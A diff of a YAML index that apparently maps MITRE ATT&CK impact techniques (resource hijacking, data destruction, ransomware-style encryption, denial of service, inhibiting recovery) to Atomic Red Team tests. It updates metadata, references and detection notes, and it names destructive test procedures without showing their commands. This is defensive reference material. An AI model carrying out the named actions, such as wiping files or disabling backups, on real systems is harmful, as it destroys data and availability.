+        description: Nathan Eades. (2023, January 12). SES-pionage. Retrieved September
+          25, 2024.
+        url: https://permiso.io/blog/s/aws-ses-pionage-detecting-ses-abuse/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1496.001:
+    technique:
+      modified: '2024-10-13T16:58:38.820Z'
+      name: Compute Hijacking
+      description: "Adversaries may leverage the compute resources of co-opted systems
+        to complete resource-intensive tasks, which may impact system and/or hosted
+        service availability. \n\nOne common purpose for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+        is to validate transactions of cryptocurrency networks and earn virtual currency.
+        Adversaries may consume enough system resources to negatively impact and/or
+        cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus
+        Under The Hood Blog 2017) Servers and cloud-based systems are common targets
+        because of the high potential for available resources, but user endpoint systems
+        may also be compromised and used for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+        and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized
+        environments may also be targeted due to the ease of deployment via exposed
+        APIs and the potential for scaling mining activities by deploying or compromising
+        multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard
+        Malware)(Citation: Trend Micro Exposed Docker APIs)\n\nAdditionally, some
+        cryptocurrency mining malware identify then kill off processes for competing
+        malware to ensure it’s not competing for resources.(Citation: Trend Micro
+        War of Crypto Miners)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      - Containers
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Network Traffic: Network Connection Creation'
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      - 'Sensor Health: Host Status'
+      - 'Process: Process Creation'
+      - 'File: File Creation'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--a718a0c8-5768-41a1-9958-a1cc3f995e99
+      created: '2024-09-25T13:34:30.100Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/001
+        external_id: T1496.001
+      - source_name: Unit 42 Hildegard Malware
+        description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
+          Malware Targeting Kubernetes. Retrieved April 5, 2021.'
+        url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
+      - source_name: CloudSploit - Unused AWS Regions
+        description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
+          Retrieved October 8, 2019.
+        url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
+      - source_name: Kaspersky Lazarus Under The Hood Blog 2017
+        description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
+          17, 2019.
+        url: https://securelist.com/lazarus-under-the-hood/77908/
+      - source_name: Trend Micro Exposed Docker APIs
+        description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
+          via Exposed APIs. Retrieved April 6, 2021.
+        url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
+      - source_name: Trend Micro War of Crypto Miners
+        description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
+          Miners: A Battle for Resources. Retrieved April 6, 2021.'
+        url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1565:
     technique:
       modified: '2024-02-02T17:18:39.004Z'
@@ -64224,11 +65203,10 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1531:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:35:13.577Z'
       name: Account Access Removal
       description: "Adversaries may interrupt availability of system and network resources
         by inhibiting access to accounts utilized by legitimate users. Accounts may
@@ -64251,6 +65229,7 @@ impact:
         phase_name: impact
       x_mitre_contributors:
       - Hubert Mank
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
@@ -64268,9 +65247,10 @@ impact:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      x_mitre_version: '1.2'
+      - IaaS
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'User Account: User Account Modification'
@@ -64296,9 +65276,8 @@ impact:
         url: https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1531
     atomic_tests:
     - name: Change User Password via passwd
@@ -64464,7 +65443,7 @@ impact:
         NHS Digital Egregor Nov 2020)\n\nIn cloud environments, storage objects within
         compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware
         Part 1)"
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-06-16T13:07:10.318Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Data Encrypted for Impact
       x_mitre_detection: |-
@@ -64488,7 +65467,6 @@ impact:
       - Availability
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1486
     atomic_tests:
     - name: Encrypt files using 7z utility - macOS
@@ -64563,7 +65541,7 @@ impact:
         elevation_required: false
   T1499:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:56:47.424Z'
       name: Endpoint Denial of Service
       description: |
         Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -64582,7 +65560,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Alfredo Oliveira, Trend Micro
       - David Fiser, @anu4is, Trend Micro
@@ -64599,18 +65576,13 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
-      x_mitre_version: '1.1'
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Flow'
@@ -64634,8 +65606,8 @@ impact:
       - source_name: FSISAC FraudNetDoS September 2012
         description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
           Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
-          Fraud. Retrieved April 18, 2019.
-        url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+          Fraud. Retrieved September 23, 2024.
+        url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
       - source_name: ArsTechnica Great Firewall of China
         description: Goodin, D.. (2015, March 31). Massive denial-of-service attack
           on GitHub tied to Chinese government. Retrieved April 19, 2019.
@@ -64655,33 +65627,22 @@ impact:
         url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1496:
     technique:
-      modified: '2024-02-14T21:00:00.467Z'
+      modified: '2024-10-13T17:00:09.759Z'
       name: Resource Hijacking
       description: "Adversaries may leverage the resources of co-opted systems to
         complete resource-intensive tasks, which may impact system and/or hosted service
-        availability. \n\nOne common purpose for Resource Hijacking is to validate
-        transactions of cryptocurrency networks and earn virtual currency. Adversaries
-        may consume enough system resources to negatively impact and/or cause affected
-        machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood
-        Blog 2017) Servers and cloud-based systems are common targets because of the
-        high potential for available resources, but user endpoint systems may also
-        be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation:
-        CloudSploit - Unused AWS Regions) Containerized environments may also be targeted
-        due to the ease of deployment via exposed APIs and the potential for scaling
-        mining activities by deploying or compromising multiple containers within
-        an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation:
-        Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining
-        malware identify then kill off processes for competing malware to ensure it’s
-        not competing for resources.(Citation: Trend Micro War of Crypto Miners)\n\nAdversaries
-        may also use malware that leverages a system's network bandwidth as part of
-        a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498)
-        campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively,
-        they may engage in proxyjacking by selling use of the victims' network bandwidth
-        and IP address to proxyware services.(Citation: Sysdig Proxyjacking)"
+        availability. \n\nResource hijacking may take a number of different forms.
+        For example, adversaries may:\n\n* Leverage compute resources in order to
+        mine cryptocurrency\n* Sell network bandwidth to proxy networks\n* Generate
+        SMS traffic for profit\n* Abuse cloud-based messaging services to send large
+        quantities of spam messages\n\nIn some cases, adversaries may leverage multiple
+        types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking
+        2023)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -64692,7 +65653,7 @@ impact:
       - Magno Logan, @magnologan, Trend Micro
       - Vishwas Manral, McAfee
       - Yossi Weizman, Azure Defender Research Team
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: Consider monitoring process resource usage to determine anomalous
         activity associated with malicious hijacking of computer resources such as
@@ -64709,8 +65670,11 @@ impact:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '1.5'
+      - SaaS
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
       - 'File: File Creation'
@@ -64729,39 +65693,14 @@ impact:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1496
         external_id: T1496
-      - source_name: Unit 42 Hildegard Malware
-        description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
-          Malware Targeting Kubernetes. Retrieved April 5, 2021.'
-        url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
-      - source_name: CloudSploit - Unused AWS Regions
-        description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
-          Retrieved October 8, 2019.
-        url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
-      - source_name: Sysdig Proxyjacking
-        description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
-          Chat. Retrieved July 6, 2023.
-        url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
-      - source_name: Kaspersky Lazarus Under The Hood Blog 2017
-        description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
-          17, 2019.
-        url: https://securelist.com/lazarus-under-the-hood/77908/
-      - source_name: Trend Micro Exposed Docker APIs
-        description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
-          via Exposed APIs. Retrieved April 6, 2021.
-        url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
-      - source_name: Trend Micro War of Crypto Miners
-        description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
-          Miners: A Battle for Resources. Retrieved April 6, 2021.'
-        url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
-      - source_name: GoBotKR
-        description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
-          Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
-        url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+      - source_name: Sysdig Cryptojacking Proxyjacking 2023
+        description: 'Miguel Hernandez. (2023, August 17). LABRAT: Stealthy Cryptojacking
+          and Proxyjacking Campaign Targeting GitLab . Retrieved September 25, 2024.'
+        url: https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1496
     atomic_tests:
     - name: FreeBSD/macOS/Linux - Simulate CPU Load with Yes
@@ -64779,62 +65718,61 @@ impact:
         name: sh
   T1565.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
-      created: '2020-03-02T14:27:00.693Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1565.002
-        url: https://attack.mitre.org/techniques/T1565/002
-      - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
-        description: Department of Justice. (2018, September 6). Criminal Complaint
-          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
-      - source_name: FireEye APT38 Oct 2018
-        url: https://content.fireeye.com/apt/rpt-apt38
-        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
-          November 6, 2018.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-08-26T16:33:33.983Z'
+      name: Transmitted Data Manipulation
       description: |-
         Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
 
         Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Transmitted Data Manipulation
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detecting the manipulation of data as at passes over a network
         can be difficult without the appropriate tools. In some cases integrity verification
         checks, such as file hashing, may be used on critical files as they transit
         a network. With some critical processes involving transmission of data, manual
         or out-of-band integrity checking may be useful for identifying manipulated
         data. '
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: impact
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_impact_type:
       - Integrity
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
+      created: '2020-03-02T14:27:00.693Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1565/002
+        external_id: T1565.002
+      - source_name: DOJ Lazarus Sony 2018
+        description: Department of Justice. (2018, September 6). Criminal Complaint
+          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
+      - source_name: FireEye APT38 Oct 2018
+        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+          November 6, 2018.'
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1485:
     technique:
-      modified: '2023-10-03T17:30:32.192Z'
+      modified: '2024-09-25T20:46:14.641Z'
       name: Data Destruction
       description: |-
         Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as <code>del</code> and <code>rm</code> often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
@@ -64843,7 +65781,7 @@ impact:
 
         To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
 
-        In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)
+        In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -64869,9 +65807,10 @@ impact:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Snapshot: Snapshot Deletion'
+      - 'Cloud Storage: Cloud Storage Modification'
       - 'Process: Process Creation'
       - 'File: File Deletion'
       - 'Image: Image Deletion'
@@ -64927,7 +65866,6 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1485
     atomic_tests:
     - name: FreeBSD/macOS/Linux - Overwrite file with DD
@@ -64955,50 +65893,7 @@ impact:
         name: sh
   T1498:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
-      - Containers
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Yossi Weizman, Azure Defender Research Team
-      - Vishwas Manral, McAfee
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
-      type: attack-pattern
-      created: '2019-04-17T20:23:15.105Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1498
-        url: https://attack.mitre.org/techniques/T1498
-      - source_name: FireEye OpPoisonedHandover February 2016
-        url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
-        description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
-          3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
-          Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
-      - source_name: FSISAC FraudNetDoS September 2012
-        url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
-        description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
-          Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
-          Fraud. Retrieved April 18, 2019.
-      - source_name: Symantec DDoS October 2014
-        url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
-        description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
-          Retrieved April 24, 2019.
-      - source_name: Cisco DoSdetectNetflow
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T16:01:00.510Z'
       name: Network Denial of Service
       description: |-
         Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -65013,6 +65908,10 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_contributors:
+      - Yossi Weizman, Azure Defender Research Team
+      - Vishwas Manral, McAfee
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection of Network DoS can sometimes be achieved before
         the traffic volume is sufficient to cause impact to the availability of the
         service, but such response time typically requires very aggressive monitoring
@@ -65025,16 +65924,52 @@ impact:
         may be small and the indicator of an event availability of the network or
         service drops. The analysis tools mentioned can then be used to determine
         the type of DoS causing the outage and help with remediation.'
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      - Containers
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Sensor Health: Host Status'
       x_mitre_impact_type:
       - Availability
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
+      created: '2019-04-17T20:23:15.105Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1498
+        external_id: T1498
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+      - source_name: FSISAC FraudNetDoS September 2012
+        description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
+          Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
+          Fraud. Retrieved September 23, 2024.
+        url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+      - source_name: FireEye OpPoisonedHandover February 2016
+        description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
+          3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
+          Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
+        url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
+      - source_name: Symantec DDoS October 2014
+        description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
+          Retrieved April 24, 2019.
+        url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1495:
     technique:
@@ -65102,11 +66037,10 @@ impact:
       - Availability
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1490:
     technique:
-      modified: '2024-04-12T02:30:08.379Z'
+      modified: '2024-09-24T13:27:31.881Z'
       name: Inhibit System Recovery
       description: |-
         Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
@@ -65124,7 +66058,7 @@ impact:
 
         On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
 
-        Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
+        Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -65151,7 +66085,7 @@ impact:
       - Network
       - IaaS
       - Containers
-      x_mitre_version: '1.4'
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -65201,13 +66135,12 @@ impact:
         url: https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/
       - source_name: disable_notif_synology_ransom
         description: TheDFIRReport. (2022, March 1). Disabling notifications on Synology
-          servers before ransom. Retrieved October 19, 2022.
-        url: https://twitter.com/TheDFIRReport/status/1498657590259109894
+          servers before ransom. Retrieved September 12, 2024.
+        url: https://x.com/TheDFIRReport/status/1498657590259109894
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1490
     atomic_tests:
     - name: Disable Time Machine
@@ -65289,11 +66222,10 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1529:
     technique:
